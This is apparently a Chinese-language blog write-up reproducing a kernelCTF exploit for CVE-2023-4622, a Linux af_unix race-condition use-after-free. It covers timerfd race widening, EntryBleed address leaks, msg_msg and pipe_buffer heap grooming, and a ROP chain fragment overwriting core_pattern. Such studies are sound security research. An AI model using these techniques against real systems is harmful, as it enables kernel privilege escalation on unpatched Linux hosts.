KCTF CVE-2023-4622 复现

af_unix的竞争UAF，窗口并不大，从这个kctf的exp可以学到这类漏洞的利用技巧。

security-research/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md at master · google/security-research

Root Cause

该漏洞是一个条件竞争型漏洞。 unix_gc与unix_stream_sendpage存在竞争。unix_stream_sendpage在使用skb_peek_tail取出队列元素时，没有加锁，导致可以在取出后通过竞争free掉该元素，导致UAF。

static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page,
				    int offset, size_t size, int flags)
{
	// ...
 
	skb = skb_peek_tail(&other->sk_receive_queue);
	if (tail && tail == skb) {
		skb = newskb;
	} else if (!skb || !unix_skb_scm_eq(skb, &scm)) {
		if (newskb) {
			skb = newskb;
		} else {
			tail = skb;
			goto alloc_skb;
		}
	} else if (newskb) {
		/* this is fast path, we don't necessarily need to
		 * call to kfree_skb even though with newskb == NULL
		 * this - does no harm
		 */
		consume_skb(newskb);
		newskb = NULL;
	}
 
	if (skb_append_pagefrags(skb, page, offset, size)) {
		tail = skb;
		goto alloc_skb;
	}
 
	// ...`
}

Exploit

Triggering `unix_gc`

这里的unix_gc主要是用于解决cycle refcount的情况。详细参考红帽的这篇文章。

Understanding Unix Garbage Collection and its Interaction with io_uring

这里先要布置cycle refcount的uds，然后对其中一个进行close操作，这样就会通过unix_gc去free掉sk_receive_queue中的元素。（由于循环引用的机制，引用计数无法free掉，所以才使用了gc）。

Data Race

运行两个线程，一个去执行unix_gc，另一个去执行sendpage，也即splice操作。如果竞争成功，也就是说sendpage的漏洞窗口调用了unix_gc，那么就有UAF的存在。

该UAF可以实现对开头的几个字节写入内容，这样就可以构造对象重叠，这里选择的对象是msg_msg。

Extending the Race Window

这里的窗口是指从skb_peek_tail到skb_append_pagefrags，实际上也就一些指令，时间窗口很小，因此需要想办法延长窗口。

timerfd机制可以在一个指定的时间上去发送一个hardirq中断，时间可以指定nanosecond的级别。如果我们在窗口之内触发了timerfd，就会转而去执行timerfd的中断例程，会额外延长窗口时间，为unix_gc提供可乘之机。

Project Zero: Racing against the clock — hitting a tiny kernel race window

内核在触发timerfd的hardirq时，会调用timerfd_tmrproc处理函数。处理函数通过wake_up_locked_poll唤起等待的进程，其通过try_to_wake_up来设置TASK_RUNNING或者把task放置到runqueue。

如果要去延长处理函数的时间，可以去增加等待队列的长度。这里可以用多个epoll来同时等待该timerfd。

为了帮助理解该技术，我这里给了一个小例子：

static int a, b;
 
static void race_a(void) {
  a += 1; 
  mdelay(1);
  b += 1;
}
 
static noinline int race_b(void) {
  int tmp_a = a, tmp_b = b;
  ndelay(10);
 
  if (tmp_a != a && tmp_b != b) {
    return 1;
  }
  return 0;
}

如何让这里的race_b返回 1 呢？我们必须要在ndelay(10)的窗口之间执行完一次race_a。这里race_b的窗口比较小，如果直接去race很难让race_a执行完。我们可以利用timerfd的计数提前设置时钟中断，如果内核恰好在执行取值到检查逻辑之间触发了一次时钟中断，那么就有足够的时间去修改完a和b。

Victim

这里需要首先泄露一个内核堆指针，就是这里的frag，其中的off是我们可以控制的，可以写两个字节0。

static inline void __skb_fill_page_desc_noacc(struct skb_shared_info *shinfo,
					      int i, struct page *page,
					      int off, int size)
{
	skb_frag_t *frag = &shinfo->frags[i];
 
	/*
	 * Propagate page pfmemalloc to the skb if we can. The problem is
	 * that not all callers have unique ownership of the page but rely
	 * on page_is_pfmemalloc doing the right thing(tm).
	 */
	frag->bv_page		  = page;
	frag->bv_offset		  = off;
	skb_frag_size_set(frag, size);
}

EntryBleed and Leaking Kernel Heap Base

Will’s Root: EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

(水平不够，瞎写的，有能力阅读原文)

entry_SYSCALL_64的地址同时被映射到内核和用户页表上，导致可以进行prefetch侧信道攻击。我这里测试确实可以泄露出堆地址（真机），这方面的知识暂时就不在这里记录，挖个坑（：

有了堆基地址，可以事先喷大量的对象上去，这样部分地址块有就很高概率是我们要的对象。从中选取一个高概率的地址：

#define TARGET_PHYS_ADDR 0x82e2380 // high probability addr we found msg_msg after spray 794MB msg

ROP

文档里所说的技术在cve-2021-22555中有详细介绍。

security-research/pocs/linux/cve-2021-22555/writeup.md at master · google/security-research

回顾一下msg_msg结构体：

/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

现在有一个msg_msg的对象重叠。 free掉其中一个msg_msg（victim，不然检查过不去），然后连续喷一下0x80大小的msg_msgseg，也即4096 - 0x30 + 0x80 - 8，以及1024大小的msgmsg。msg_msgseg会与我们的victim相重叠，因此往里里面写入我们指定的size。这里m_list.prev指针写入一个LIST_POISON2，（这里的原理在cve-2021-22555里有写，但是注意运行内核的时候不要开启panic_on_warn，同时还要关闭CONFIG_BUG_ON_DATA_CORRUPTION，否则内核到这里无法运行下去）。

此时，由于victim大小已经被修改，可以越界读取内存。这里我们去泄露临近的msg_msg对象内容。我们free掉该临近的对象，记作victim2，再用新的msg_msg占位，并同时喷kmalloc-1024大小的msg，使新的msg_msg的mlist->next指向kmalloc-1024。

我们再次读取victim的内容，即可读取到新占位的msg_msg的指针。此时free掉该kmalloc-1024对象，然后分配一个pipe_buffer去占位。

后面用一个新的msg_msg把原来在victim位置上的替换掉，把0x200大小改成0x400，把next指针设置为pipe_buffer，然后读取pipe_buffer指针内容，包括anon_pipe_buf_ops。

如何释放掉该pipe_buffer呢？这里用到一个security字段，可以实现任意free。我们在victim里的security字段填入pipe_buffer的地址，即可free掉整个buffer。

void security_msg_msg_free(struct msg_msg *msg)
{
	call_void_hook(msg_msg_free_security, msg);
	kfree(msg->security);
	msg->security = NULL;
}

后面再喷进msg_msgseg进去即可，往msgseg里面写入rop链条。

最后一步，此处触发pipe_buffer的ops操作，选择close，即可触发rop链。

ROP Chain

static const struct pipe_buf_operations anon_pipe_buf_ops = {
	.release	= anon_pipe_buf_release,
	.try_steal	= anon_pipe_buf_try_steal,
	.get		= generic_pipe_buf_get,
};
 
static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
				  struct pipe_buffer *buf);

经典的栈迁移然后ROP。用到的一些gadget是：

push rsi ; jmp qword ptr [rsi + 0x2e]
pop rsp ; pop r15 ; ret
pop rdi ; ret
pop rsp ; ret

然后会在pipe_buffer + 0x50处继续：

	ROP(i++) = POP_RDI;
	ROP(i++) = CORE_PATTERN;
	ROP(i++) = POP_RSI2;
	ROP(i++) = (size_t)&user_buf;
	ROP(i++) = POP_RDX;
	ROP(i++) = sizeof(user_buf);
	ROP(i++) = COPY_FROM_USER;
	// msleep(0x10000);
	ROP(i++) = POP_RDI;
	ROP(i++) = 0x10000;
	ROP(i++) = MSLEEP;

下面是运行的截图（懒得找gadget了😭，有时间看看其他的利用方法比如pagejack）

✨ Le Premier Homme

探索

KCTF CVE-2023-4622 复现

Root Cause

Exploit

Triggering `unix_gc`

Data Race

Extending the Race Window

Victim

EntryBleed and Leaking Kernel Heap Base

ROP

ROP Chain

关系图谱

目录

反向链接

✨ Le Premier Homme

探索

KCTF CVE-2023-4622 复现

Root Cause

Exploit

Triggering unix_gc

Data Race

Extending the Race Window

Victim

EntryBleed and Leaking Kernel Heap Base

ROP

ROP Chain

关系图谱

目录

反向链接

Triggering `unix_gc`